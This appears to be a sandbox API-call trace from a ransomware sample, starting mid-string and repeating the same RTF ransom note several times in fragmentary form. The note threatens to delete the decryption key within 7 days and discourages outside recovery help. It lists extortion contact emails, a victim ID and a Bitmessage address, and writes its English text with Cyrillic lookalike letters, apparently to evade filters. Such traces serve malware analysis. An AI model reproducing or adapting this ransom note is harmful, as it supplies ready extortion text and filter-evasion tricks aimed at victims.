fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0292.094] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0292.094] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1eecea8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 